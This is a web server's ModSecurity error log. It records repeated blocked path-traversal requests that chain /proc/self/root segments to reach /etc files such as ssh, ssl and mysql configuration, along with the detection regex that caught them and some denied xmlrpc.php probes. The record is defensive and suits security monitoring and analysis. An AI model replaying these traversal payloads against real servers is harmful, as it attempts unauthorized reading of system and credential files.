[Tue Mar 17 10:45:35.923444 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:41722] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla_9CmCSWTlPouqorTsAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:37.581662 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.243.203:41738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbAQeiSKl8TjouI-YI8QAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:38.948274 2026] [:error] [pid 17965:tid 140411557287680] [client 74.7.243.203:41744] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbAqt8Nd0UC_OcbVG25gAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:40.553866 2026] [access_compat:error] [pid 18604:tid 140411674785536] [client 186.33.117.171:62709] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:45:40.586036 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:59544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbBDarLhPAjZGI1b21XwAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:41.951528 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:59558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbBQeiSKl8TjouI-YI8wAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:42.394899 2026] [access_compat:error] [pid 1016:tid 140411548894976] [client 186.33.117.171:56033] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:45:43.194702 2026] [:error] [pid 1731:tid 140411741927168] [client 74.7.243.203:59560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbBwb2qCuy5irgBMjPlQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:44.617810 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.243.203:59572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbCK4xEDsg_V3ESNY6_QAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:44.631523 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.241.46:36148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbCNCmCSWTlPouqorTvAAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:45.823266 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.243.203:59578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbCdCmCSWTlPouqorTvQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:47.205433 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:59586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbCzarLhPAjZGI1b21YwAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:47.966276 2026] [access_compat:error] [pid 2325:tid 140411691570944] [client 103.142.0.112:63280] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:45:49.508192 2026] [:error] [pid 18709:tid 140411616036608] [client 74.7.243.203:59592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbDTarLhPAjZGI1b21ZgAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:45:51.600275 2026] [access_compat:error] [pid 2325:tid 140411725141760] [client 103.142.0.112:63289] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:45:55.766527 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.243.203:47486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbEtCmCSWTlPouqorTyAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:46:04.773890 2026] [:error] [pid 11293:tid 140411616036608] [client 74.7.243.203:47498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbHNCmCSWTlPouqorT2AAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:46:07.223623 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.241.46:58040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbH9CmCSWTlPouqorT2wAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:46:12.441532 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.228.16:34608] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablbJO82sZHvlq4xgHrKqwAAAoc"]
[Tue Mar 17 10:46:36.573915 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.243.203:57810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbPJqmL8PQht4WJFlPLQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:46:37.984735 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.243.203:50980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbPe82sZHvlq4xgHrKtgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:46:43.939095 2026] [:error] [pid 2325:tid 140411716749056] [client 74.7.243.203:50986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbQ-82sZHvlq4xgHrKvQAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:46:55.003086 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.203:57230] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbT6t8Nd0UC_OcbVG3BAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:47:01.101269 2026] [access_compat:error] [pid 18709:tid 140411666392832] [client 223.165.69.56:61247] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:47:01.102250 2026] [access_compat:error] [pid 18709:tid 140411741927168] [client 223.165.69.56:61246] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Tue Mar 17 10:47:05.141543 2026] [:error] [pid 18709:tid 140411632822016] [client 74.7.241.46:57224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbWTarLhPAjZGI1b21oAAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:47:07.595827 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:59282] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablbWweiSKl8TjouI-YJGQAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
